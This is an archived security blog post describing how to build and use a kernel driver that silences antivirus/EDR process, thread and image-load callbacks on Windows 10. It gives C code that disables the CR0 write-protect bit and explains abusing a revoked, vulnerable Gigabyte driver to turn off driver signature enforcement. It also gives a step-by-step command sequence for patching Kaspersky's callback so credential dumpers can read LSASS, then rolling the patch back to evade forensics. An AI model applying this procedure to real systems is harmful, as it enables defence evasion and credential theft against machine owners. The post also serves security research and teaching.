<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
        <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="author" content="Matteo Malvica ">
<meta name="description" content="Backround - TL;DR This post is about resuming the very inspiring Rui&amp;rsquo;s piece on Windows Kernel&amp;rsquo;s callbacks and taking it a little further by extending new functionalities and build an all-purpose AV/EDR runtime detection bypass. Specifically, we are going to see how Kaspersky Total Security and Windows Defender are using kernel callbacks to either inhibit us from accessing LSASS loaded module or detect malicious activities. We&amp;rsquo;ll then use our evil driver to temporarily silence any registered AV&amp;rsquo;s callbacks and restore EDR original code once we are done with our task.">
<meta name="keywords" content="infosec,hacking,exploit dev,reverse engineering">
<meta name="robots" content="noodp">
<link rel="canonical" href="https://www.matteomalvica.com/blog/2020/07/15/silencing-the-edr/">


<title>
    
    Silencing the EDR. How to disable process, threads and image-loading detection callbacks. ::   — uf0
    
</title>



<link href="Silencing%20the%20EDR.%20How%20to%20disable%20process,%20threads%20and%20image-loading%20detection%20callbacks.%20%E2%80%94%20uf0_files/flag-icon.css" rel="stylesheet" type="text/css">



<link rel="stylesheet" href="Silencing%20the%20EDR.%20How%20to%20disable%20process,%20threads%20and%20image-loading%20detection%20callbacks.%20%E2%80%94%20uf0_files/main.css">



<link rel="stylesheet" type="text/css" href="Silencing%20the%20EDR.%20How%20to%20disable%20process,%20threads%20and%20image-loading%20detection%20callbacks.%20%E2%80%94%20uf0_files/syntax.css">



<link rel="apple-touch-icon" sizes="180x180" href="https://www.matteomalvica.com/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="https://www.matteomalvica.com/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="https://www.matteomalvica.com/favicon-16x16.png">
<link rel="manifest" href="https://www.matteomalvica.com/site.webmanifest">
<link rel="mask-icon" href="https://www.matteomalvica.com/safari-pinned-tab.svg" color="#252627">
<link rel="shortcut icon" href="https://www.matteomalvica.com/favicon.ico">
<meta name="theme-color" content="#252627">
<meta itemprop="name" content="Silencing the EDR. How to disable process, threads and image-loading detection callbacks.">
<meta itemprop="description" content="Inspecting registered kernel callbacks and patch them without triggering BSOD">


<meta itemprop="datePublished" content="2020-07-15T00:00:00+00:00">
<meta itemprop="dateModified" content="2020-07-15T00:00:00+00:00">
<meta itemprop="wordCount" content="2187">

  <meta itemprop="image" content="https://www.matteomalvica.com/img/evildriver/spider.jpg">



<meta itemprop="keywords" content="EDR,bypass,reversing,exploitation,">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://www.matteomalvica.com/img/evildriver/spider.jpg">

<meta name="twitter:title" content="Silencing the EDR. How to disable process, threads and image-loading detection callbacks.">
<meta name="twitter:description" content="Inspecting registered kernel callbacks and patch them without triggering BSOD">



<meta property="article:section" content="Security">

<meta property="article:published_time" content="2020-07-15 00:00:00 +0000 UTC">







    </head>

    <body class="">
        <div class="container">
            <header class="header">
    <span class="header__inner">
        <a href="https://www.matteomalvica.com/" style="text-decoration: none;">
    <div class="logo">
        
            <span class="logo__mark">&gt;</span>
            <span class="logo__text">/home/uf0</span>
            <span class="logo__cursor"></span>
        
    </div>
</a>


        <span class="header__right">
            
                <nav class="menu">
    <ul class="menu__inner"><li><a href="https://www.matteomalvica.com/blog/">blog</a></li><li><a href="https://www.matteomalvica.com/hacks">hacks &amp; tools</a></li><li><a href="https://www.matteomalvica.com/minutes">minutes</a></li><li><a href="https://www.matteomalvica.com/tutorials">tutorials</a></li><li><a href="https://www.matteomalvica.com/whoami/">whoami</a></li>
    </ul>
</nav>

                <span class="menu-trigger hidden">
                    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
                        <path d="M0 0h24v24H0z" fill="none"></path>
                        <path d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z"></path>
                    </svg>
                </span>
                
                
<script async="" src="Silencing%20the%20EDR.%20How%20to%20disable%20process,%20threads%20and%20image-loading%20detection%20callbacks.%20%E2%80%94%20uf0_files/analytics.js"></script><script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
	ga('create', 'UA-54156854-1', 'auto');
	
	ga('send', 'pageview');
}
</script>

                
            

            <span class="theme-toggle"><svg class="theme-toggler" width="24" height="24" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">
  <path d="M22 41C32.4934 41 41 32.4934 41 22C41 11.5066 32.4934 3 22
  3C11.5066 3 3 11.5066 3 22C3 32.4934 11.5066 41 22 41ZM7 22C7
  13.7157 13.7157 7 22 7V37C13.7157 37 7 30.2843 7 22Z"></path>
</svg>
</span>
        </span>
    </span>
</header>


            <div class="content">
                
    <main class="post">

        <div class="post-info">
            
            <p></p>
        </div>

        <article>
            <h2 class="post-title"><a href="https://www.matteomalvica.com/blog/2020/07/15/silencing-the-edr/">Silencing the EDR. How to disable process, threads and image-loading detection callbacks.</a></h2>

            

            <div class="post-content">
                


  <img src="Silencing%20the%20EDR.%20How%20to%20disable%20process,%20threads%20and%20image-loading%20detection%20callbacks.%20%E2%80%94%20uf0_files/spider.jpg" alt="spider" class="center">



<h2 id="backround-tl-dr">Backround - TL;DR</h2>

<p>This post is about resuming the very inspiring Rui’s <a href="http://deniable.org/windows/windows-callbacks" target="_blank">piece</a>
 on Windows Kernel’s callbacks and taking it a little further by 
extending new functionalities and build an all-purpose AV/EDR runtime 
detection bypass.
Specifically, we are going to see how Kaspersky Total Security and 
Windows Defender are using kernel callbacks to either inhibit us from 
accessing LSASS loaded module or detect malicious activities.
We’ll then use our evil driver to temporarily silence any registered 
AV’s callbacks and restore EDR original code once we are done with our 
task.
The resulting tool has been tested on the following Windows 10 builds: 
1903,1909 and 2004.</p>

<h2 id="why-avs-use-callbacks-and-mini-filters">Why AVs use callbacks and mini-filters</h2>

<p>For a long time Microsoft had being trying since long time to shift and confine any 3rd party <strong>ring0</strong>
 code to anywhere else that is not the kernel itself.
This is for obvious reasons, mainly to disallow other parties messing 
around with kernel code and avoid giving them access to KPP (Kernel 
Patch Protection) bypasses.
Because of this, EDR vendors are forced to adopt other means to interact
 with the kernel, namely <strong>callbacks</strong> and <strong>minifilters</strong>.
The purpose of Minifilters drivers is to intercept filesystem I/O requests and extend or replace the native functionalities.
Meanwhile, callbacks are the one needed to intercept process/threads creation and image loading.</p>

<h2 id="evil-driver-new-features-installation-and-usage">Evil-driver: new features, installation and usage.</h2>

<p>To me the best way to learn a topic is to build up from the theory 
and put it into something tangible, otherwise brain’s phosphorus won’t 
do its job.
I so decided to continue on Rui’s Evil driver and adding support for 
thread and image load callbacks suppression, as well as compatibility 
with the latest windows 10 releases.
On top of this I have also included the option to rollback any change 
made after having patched (RET) the target callback.</p>

<p>So let’s get our hands dirty and see what can be accomplished with the evil driver.
Grab a copy of the Visual Studio project <a href="https://github.com/uf0o/windows-ps-callbacks-experiments/tree/master/evil-driver" target="_blank">here</a>, compile it for x64, Debug Mode.
Debug mode will enable <strong>KdPrint</strong> statements and allow us to observe driver’s behavior via either (DebugView)[<a href="https://docs.microsoft.com/en-us/sysinternals/downloads/debugview" target="_blank">https://docs.microsoft.com/en-us/sysinternals/downloads/debugview</a>] from SysInternals or through a WinDbg remote kernel session.</p>

<p>A successful compilation will have generated two binaries: the <code>evilcli.exe</code> user mode command line interface and  the <code>evil.sys</code> driver itself.
Since our driver is not signed, before proceeding with any installation, we need to enable test mode from an elevated cmd with <code>Bcdedit.exe -set TESTSIGNING ON</code> and reboot the machine.
Later on we are going to see how to deliver the very same driver in a normal scenario, without <strong>testsigning</strong> being enabled.</p>

<p>The CLI is equipped with the following options:</p>

<pre><code>C:\Users\matteo\windows-ps-callbacks-experiments-master\evil-driver\x64\Debug&gt;evilcli.exe
Usage: evilcli.exe &lt;options&gt;
Options:
  -h            Show this message.
  -l            Process, Thread &amp; LoadImage Notify Callbacks Address's List.
&lt;Process Callbacks&gt;
  -zp           Zero out Process Notify Callback's Array (Cowboy Mode).
  -dp &lt;index&gt;   Delete Specific Process Notify Callback (Red Team Mode).
  -pp &lt;index&gt;   Patch Specific Process Notify Callback (Threat Actor Mode).
  -rp &lt;index&gt;   Rollback to the original Process Notify Callback (Thoughtful Ninja Mode).
&lt;Threads Callbacks&gt;
  -zt           Zero out Thread Notify Callback's Array (Cowboy Mode).
  -dt &lt;index&gt;   Delete Specific Thread Notify Callback (Red Team Mode).
  -pt &lt;index&gt;   Patch Specific Thread Notify Callback (Threat Actor Mode).
  -rt &lt;index&gt;   Rollback to the original Thread Notify Callback (Thoughtful Ninja Mode).
&lt;LoadImage Callbacks&gt;
  -zl           Zero out Thread Notify Callback's Array (Cowboy Mode).
  -dl &lt;index&gt;   Delete Specific Thread Notify Callback (Red Team Mode).
  -pl &lt;index&gt;   Patch Specific Thread Notify Callback (Threat Actor Mode).
  -rl &lt;index&gt;   Rollback to the original Thread Notify Callback (Thoughtful Ninja Mode).
</code></pre>

<p>Most of them have been already largely covered by Rui’s post, so I 
will simply highlight the possibility of restoring a patched callback 
with either <code>rp</code> or <code>rt</code> depending on whether is related to a process or thread.</p>

<p>We should remember that this battle is fought between two entities running with the same ring0 ground, so it’s a zero-sum game.
So as a disclaimer, the evil driver will only succeed on any system without HyperV enabled.</p>

<h2 id="hyperguard-and-kpp-are-barking-at-us">HyperGuard and KPP are barking at us</h2>

<p>If HyperV is enabled on the system, it will detect any kernel or 
driver alteration at runtime and will immediately shred our dreams of 
persistence with a well-deserved <code>System Service Exception</code> BSOD.
More on HyperV and its security features will probably come in a dedicated post.
In the meanwhile, in order to continue playing with our driver we need to disable the hypervisor with <code>bcdedit /set hypervisorlaunchtype off</code> and power-cycle it.</p>

<p>Nevertheless, we still need to find a method to let our kernel-patching coexists with KPP, alias PatchGuard.
In short, KPP tries to prevent any critical kernel structure modification by bug checking any attempt to it.
Still, this check is triggered by unsynchronized timers, as already documented in many different places, notably <a href="http://www.uninformed.org/?v=6&amp;a=1&amp;t=sumry" target="_blank">uninformed</a> and <a href="https://blog.tetrane.com/downloads/Tetrane_PatchGuard_Analysis_RS4_v1.01.pdf" target="_blank">tetrane</a>.
We’ll see how to work around PatchGuard in a moment, after dealing with a more urgent hurdle.</p>

<h2 id="inhibit-writeprotect-at-will">Inhibit WriteProtect at will</h2>

<p>The obstacle we have to overcome is that our target callbacks reside in READONLY kernel memory pages.
And those pages cannot clearly be modified with our patch.</p>

<pre><code>lkd&gt; !pte 0xfffff80267fdd670
                                           VA fffff80267fdd670
PXE at FFFF85C2E170BF80    PPE at FFFF85C2E17F0048    PDE at FFFF85C2FE0099F8    PTE at FFFF85FC0133FEE8
contains 0000000005108063  contains 0000000005109063  contains 0000000005219063  contains 09000000035C5021
pfn 5108      ---DA--KWEV  pfn 5109      ---DA--KWEV  pfn 5219      ---DA--KWEV  pfn 35c5      ----A--KREV
</code></pre>

<p>The PTE is indeed READONLY (<code>R</code> flag in <code>----A--KREV</code>) and if we are stubborn enough to mess with it, we’ll get bounced by BSOD.</p>


  <img src="Silencing%20the%20EDR.%20How%20to%20disable%20process,%20threads%20and%20image-loading%20detection%20callbacks.%20%E2%80%94%20uf0_files/bsod2.png" class="center">



<p>Well, how do we make our page writable then?
Our holy grail is the CR0 register, which is one of the other control 
registers, which is responsible for determining the operating mode of 
the processor and the characteristics of the current thread.
Register’s bit number 16 is the WP (Write Protect) flag, the one that we
 need to clear.
We then poison CR0 16th bit by using the following MDL (Memory 
Descriptor List) as a struct to represent the register <a href="https://github.com/seporaitis/xv6-public/wiki/CPU-Registers-CR0" target="_blank">layout</a></p>
<div class="highlight"><pre class="chroma language-c"><code class=" language-c" data-lang="C"><span class="token keyword">typedef</span> <span class="token keyword">union</span> <span class="token punctuation">{</span>
	<span class="token keyword">struct</span> <span class="token punctuation">{</span>
		UINT64 protection_enable <span class="token operator">:</span> <span class="token number">1</span><span class="token punctuation">;</span>
		UINT64 monitor_coprocessor <span class="token operator">:</span> <span class="token number">1</span><span class="token punctuation">;</span>
		UINT64 emulate_fpu <span class="token operator">:</span> <span class="token number">1</span><span class="token punctuation">;</span>
		UINT64 task_switched <span class="token operator">:</span> <span class="token number">1</span><span class="token punctuation">;</span>
		UINT64 extension_type <span class="token operator">:</span> <span class="token number">1</span><span class="token punctuation">;</span>
		UINT64 numeric_error <span class="token operator">:</span> <span class="token number">1</span><span class="token punctuation">;</span>
		UINT64 reserved_1 <span class="token operator">:</span> <span class="token number">10</span><span class="token punctuation">;</span>
		UINT64 write_protect <span class="token operator">:</span> <span class="token number">1</span><span class="token punctuation">;</span>
		UINT64 reserved_2 <span class="token operator">:</span> <span class="token number">1</span><span class="token punctuation">;</span>
		UINT64 alignment_mask <span class="token operator">:</span> <span class="token number">1</span><span class="token punctuation">;</span>
		UINT64 reserved_3 <span class="token operator">:</span> <span class="token number">10</span><span class="token punctuation">;</span>
		UINT64 not_write_through <span class="token operator">:</span> <span class="token number">1</span><span class="token punctuation">;</span>
		UINT64 cache_disable <span class="token operator">:</span> <span class="token number">1</span><span class="token punctuation">;</span>
		UINT64 paging_enable <span class="token operator">:</span> <span class="token number">1</span><span class="token punctuation">;</span>
	<span class="token punctuation">}</span><span class="token punctuation">;</span>

	UINT64 flags<span class="token punctuation">;</span>
<span class="token punctuation">}</span> cr0<span class="token punctuation">;</span></code></pre></div>
<p>And removing the write protect flag from CR0.</p>
<div class="highlight"><pre class="chroma language-c"><code class=" language-c" data-lang="C"><span class="token keyword">void</span> <span class="token function">CR0_WP_OFF_x64</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">{</span>
	cr0 mycr0<span class="token punctuation">;</span>
	mycr0<span class="token punctuation">.</span>flags <span class="token operator">=</span> <span class="token function">__readcr0</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	mycr0<span class="token punctuation">.</span>write_protect <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span>
	<span class="token function">__writecr0</span><span class="token punctuation">(</span>mycr0<span class="token punctuation">.</span>flags<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span></code></pre></div>
<p>While not forgetting to apply the change  on each logical processor and restore the usermode thread <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-kesetsystemaffinitythreadex" target="_blank">affinity</a>.</p>
<div class="highlight"><pre class="chroma language-c"><code class=" language-c" data-lang="C"><span class="token keyword">int</span> LogicalProcessorsCount <span class="token operator">=</span> KeQueryActiveProcessorCount

<span class="token keyword">for</span> <span class="token punctuation">(</span>ULONG64 processorIndex <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> processorIndex <span class="token operator">&lt;</span> LogicalProcessorsCount<span class="token punctuation">;</span> processorIndex<span class="token operator">++</span><span class="token punctuation">)</span>
<span class="token punctuation">{</span>
	KAFFINITY oldAffinity <span class="token operator">=</span> <span class="token function">KeSetSystemAffinityThreadEx</span><span class="token punctuation">(</span><span class="token punctuation">(</span>KAFFINITY<span class="token punctuation">)</span><span class="token punctuation">(</span><span class="token number">1</span>i64 <span class="token operator">&lt;&lt;</span> processorIndex<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">CR0_WP_OFF_x64</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">KeRevertToUserAffinityThreadEx</span><span class="token punctuation">(</span>oldAffinity<span class="token punctuation">)</span><span class="token punctuation">;</span></code></pre></div>
<p>Knowing we don’t have to deal with an instant detection method (KPP),
 we can build our kernel data structure modification strategy around 
these points:</p>

<ul>
<li>Clear the WP bit from the write-only page <em>on each core</em></li>
<li>Do our stuff</li>
<li>Restore the WP bit</li>
</ul>

<p>We could have achieved the same synchronization primitive by using the <a href="https://en.wikipedia.org/wiki/Greg_Hoglund" target="_blank">‘Hoglund’</a> way via <em>NOPped</em> DPC and increasing/decreasing IRQL, but it is a less elegant solution since it partially halting the system.</p>

<blockquote>
<p>UPDATE: The above sentence is not entirely correct: Hoglund’s 
synchronization primitive is employed to achieve a mutex-like 
independent access on a shared kernel object in a multicore system (i.e.
 EPROCESS), whereas swapping thread affinity is done with the purpose of
 running the same thread on each CPU to alter a CPU-specific value (CR0 
in this case).</p>
</blockquote>

<p>The only risk we could incur is to meet a KPP check while writing to 
the page, but I am confident that the odds are pretty low ☺️
Excellent. Now we have enough powers to patch our beloved callbacks, 
restore their original code or even erase them all.
Forgot anything? Well, due to our unsigned driver we are still forced to
 operate under the <code>TESTSIGNING</code>, so a real-world system will defeat our attack due to Driver Signature Enforcement.
Do we have any ace left up our sleeve?</p>

<h2 id="gigabyte-driver-gone-not-really">Gigabyte driver gone? Not really!</h2>

<p>What if a legitimately signed driver is vulnerable to a 
Write-What-Where vulnerability that allows us to overwrite kernel memory
 space, and disable Driver Signature Enforcement?</p>

<p>For many years now this has been the case of a the well-known vulnerable <a href="https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities" target="_blank">GigaByte</a> driver, which has been used for different purposes, from disabling videogames anti-cheating to ransomware.</p>

<p>Anyway, our sole goal here is to disable code integrity as a whole, and this can be done by just editing the <code>CI!g_CiOptions</code> global value (more info on this on Rui’s post).
In order to do that we just need to grab <a href="https://github.com/fdiskyou/CVE-2018-19320" target="_blank">this</a> and we can disable <em>CI</em>.</p>

<p>But how come is that we are still able to register, install and run a
 driver with a revoked certificate? Shouldn’t we be blocked?
Even if we test with <strong>SecureBoot</strong> enabled, as MSDN suggest, we are still able to circumvent the control and load the driver.</p>
<div class="highlight"><pre class="chroma language-text"><code class=" language-text" data-lang="text">&gt;signtool.exe verify /v /kp GIO.sys

Verifying: GIO.sys

Signature Index: 0 (Primary Signature)
Hash of file (sha1): 0F5034FCF5B34BE22A72D2ECC29E348E93B6F00F

Signing Certificate Chain:
    Issued to: Class 3 Public Primary Certification Authorityi
    Issued by: Class 3 Public Primary Certification Authority
    Expires:   Wed Aug 02 01:59:59 2028
    SHA1 hash: 742C3192E607E424EB4549542BE1BBC53E6174E2

        Issued to: VeriSign Class 3 Code Signing 2009-2 CA
        Issued by: Class 3 Public Primary Certification Authority
        Expires:   Tue May 21 01:59:59 2019
        SHA1 hash: 12D4872BC3EF019E7E0B6F132480AE29DB5B1CA3

            Issued to: Giga-Byte Technology
            Issued by: VeriSign Class 3 Code Signing 2009-2 CA
            Expires:   Fri Oct 18 01:59:59 2013
            SHA1 hash: 32DAEE48AE406222C2BB92C4F1B7F516E537175A
The signature is timestamped: Thu Jul 04 05:32:11 2013
[...]

SignTool Error: WinVerifyTrust returned error: 0x800B010C
        A certificate was explicitly revoked by its issuer.

Number of files successfully Verified: 0
Number of warnings: 0
Number of errors: 1</code></pre></div>
<p>Why is that?</p>

<p>If we check <a href="https://docs.microsoft.com/en-gb/windows-hardware/drivers/install/kernel-mode-code-signing-policy--windows-vista-and-later-" target="_blank">MSDN</a> exceptions from signing policy we notice that:</p>

<pre><code>- The PC was upgraded from an earlier release of Windows to Windows 10, version 1607.
- Secure Boot is off in the BIOS.
- Driver was signed with an end-entity certificate issued prior to July 29th 2015 that chains to a supported cross-signed CA
</code></pre>

<p>We comply on the first two, but the third point is the one that gets 
us out of jail free, as the driver’s timestamp is prior to 7/29/2015.
Basically, due to compatibility reasons, any cross-signed driver that 
has been signed prior to that date AND its certificate has been revoked,
 will still be allowed (unless MS will change this policy).
There are actually two different versions of this driver out there, 
though one is newer (signed after 2015), which won’t load without 
TESTSIGNING mode.
So the good news is that even if the cert is revoked, we can still load 
it if UEFI SecureBoot is enabled.</p>

<h2 id="disabling-kaspersky-total-security-lsass-enumeration-and-windows-defender-runtime-detection">Disabling Kaspersky Total Security LSASS enumeration and Windows Defender runtime detection</h2>

<p><em>Disclaimer: the evasion technique below will work only on novel 
malware - anything detected by a signature (i.e Mimikatz) AND not 
packed, will of course be immediately blocked by the minifilter driver.</em></p>

<p>Historically, Kaspersky Total Security had been quite effective in 
stopping any LSASS credential dumper (like Mimikatz) from enumerating 
LSASS process modules.
With our <code>evildriver</code> we can patch the main EDR’s process callback responsible from blocking process module enumeration.</p>

<p>Given all the above, we can then proceed as follows:</p>

<ul>
<li>Install and start the gdrv.sys driver from an elevated prompt</li>
</ul>

<pre><code>sc create gdrv type= kernel binPath= c:\path\to\file\gdrv.sys
sc start gdrv
</code></pre>

<ul>
<li>Run the Gigabyte_CI.exe and disable driver’s signature CI</li>
</ul>

<pre><code>C:\Users\matteo\Desktop\Debug&gt;Gigabyte_CI.exe -l
Build 18363
FFFFF8045CFD0000 (CI.dll)
FFFFF8045D011130 (Ci!CiInitialize)
FFFFF8045D007278 (CI!g_CiOptions)

C:\Users\matteo\Desktop\Debug&gt;Gigabyte_CI.exe -d
[+] Driver Signing has been DISABLED!
</code></pre>

<ul>
<li>Install and start the evildriver.sys driver from elevated prompt</li>
</ul>

<pre><code>sc create evil type= kernel binPath= c:\path\to\file\evildriver.sys
sc start evil
</code></pre>

<ul>
<li>Interact with the evil driver by inspecting the registered callbacks on the system</li>
</ul>

<pre><code>C:\Users\matteo\Desktop\Debug&gt;evilcli.exe -l
[00] 0xfffff8012154a340 (ntoskrnl.exe + 0x34a340)
[01] 0xfffff801250f4dc0 (cng.sys + 0x14dc0)
[02] 0xfffff80125548610 (klupd_klif_arkmon.sys + 0x18610)
[03] 0xfffff80124f3d870 (ksecdd.sys + 0x1d870)
[04] 0xfffff80126390960 (tcpip.sys + 0x60960)
[05] 0xfffff801269ed930 (iorate.sys + 0xd930)
[06] 0xfffff80125067fc0 (CI.dll + 0x77fc0)
[07] 0xfffff80127161600 (klflt.sys + 0x11600)
[08] 0xfffff801272189d0 (dxgkrnl.sys + 0x89d0)
[09] 0xfffff801283d47f0 (kldisk.sys + 0x47f0)
[10] 0xfffff80127ac9e90 (vm3dmp.sys + 0x9e90)
[11] 0xfffff801294e3ce0 (peauth.sys + 0x43ce0)
[12] 0xfffff8012531f9a0 (mssecflt.sys + 0x1f9a0)
</code></pre>

<ul>
<li>Disable the desired callback by placing a RET (<code>C3</code>) instruction at the same offset. This way the callback will just return to the caller and skip any subsequent code.
Don’t use any other option (-z or -d) as they might corrupt the system.</li>
</ul>

<pre><code>C:\Users\matteo\Desktop\Debug&gt;evilcli.exe -p 7
Patching index: 7 with a RET (0xc3)
</code></pre>

<ul>
<li><p>Perform our task</p></li>

<li><p>Restore the callback to its original state. (NOTE: most AV/EDR 
don’t have code integrity, but it’s better to be safe than sorry, 
especially to avoid leaving any trace after a forensic memdump).</p></li>
</ul>

<pre><code>C:\Users\matteo\Desktop\Debug&gt;evilcli.exe -r 7
Rolling back patched index: 7 to the original values
</code></pre>

<ul>
<li>Stop and unregister the x2 drivers.</li>
</ul>

<pre><code>sc stop evil
sc stop gdrv
sc delete gdrv
sc delete evil
</code></pre>

<p>I leave the MS Defender evasion as an exercise for the reader ;)</p>

<p><strong>Note:</strong>
As per July 2020, the only supported SDK/WDK version of the project is 18346.</p>

<p><strong>Credits</strong></p>

<ul>
<li>Thanks to Rui Reis for the initial idea and chats along the road.</li>
<li>Big shout-out to Pavel Yosifovich’s kernel internals <a href="https://www.amazon.com/Windows-Kernel-Programming-Pavel-Yosifovich-ebook/dp/B07TJT1GTF" target="_blank">book</a> which made all this effort more bearable.</li>
</ul>

            </div>
        </article>

        <hr>

        <div class="post-info">
  				<p>
  					<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-tag meta-icon"><path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7" y2="7"></line></svg><span class="tag"><a href="https://www.matteomalvica.com/tags/edr">EDR</a></span><span class="tag"><a href="https://www.matteomalvica.com/tags/bypass">bypass</a></span><span class="tag"><a href="https://www.matteomalvica.com/tags/reversing">reversing</a></span><span class="tag"><a href="https://www.matteomalvica.com/tags/exploitation">exploitation</a></span>
  				</p>
  			</div>

        
    </main>

            </div>

            
                <footer class="footer">
    <div class="footer__inner">
        <div class="footer__content">
            <span>© 2021</span>
            
                <span><a href="https://www.matteomalvica.com/">Matteo Malvica</a></span>
            
            <span><a href="https://creativecommons.org/licenses/by-nc/4.0/" target="_blank" rel="noopener">CC BY-NC 4.0</a></span>
            <span> <a href="https://www.matteomalvica.com/index.xml" target="_blank" title="rss"><svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 20 20" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-rss"><path d="M4 11a9 9 0 0 1 9 9"></path><path d="M4 4a16 16 0 0 1 16 16"></path><circle cx="5" cy="19" r="1"></circle></svg></a></span>
        </div>
    </div>
    <div class="footer__inner">
        <div class="footer__content">

        </div>
    </div>
    <div class="footer__inner">
        <div class="footer__content">
            <span><h6>Illustrations by &nbsp;<a target="_blank" href="https://instagram.com/sergio_kalisiak">  Sergio Kalisiak</a>
             </h6></span>
        </div>
    </div>
</footer>

            
        </div>

        




<script type="text/javascript" src="Silencing%20the%20EDR.%20How%20to%20disable%20process,%20threads%20and%20image-loading%20detection%20callbacks.%20%E2%80%94%20uf0_files/bundle.js" integrity="sha512-nlLmiwgs8qMKf+rYgmDtuIGPvX94MeOWdJF9RTnsdd9Buojq3fvZFllKtPsqMZE7Rs8tYJTPgDge24xjJRKoyg=="></script>




	
		<script src="Silencing%20the%20EDR.%20How%20to%20disable%20process,%20threads%20and%20image-loading%20detection%20callbacks.%20%E2%80%94%20uf0_files/script.js"></script>
	


    

</body></html>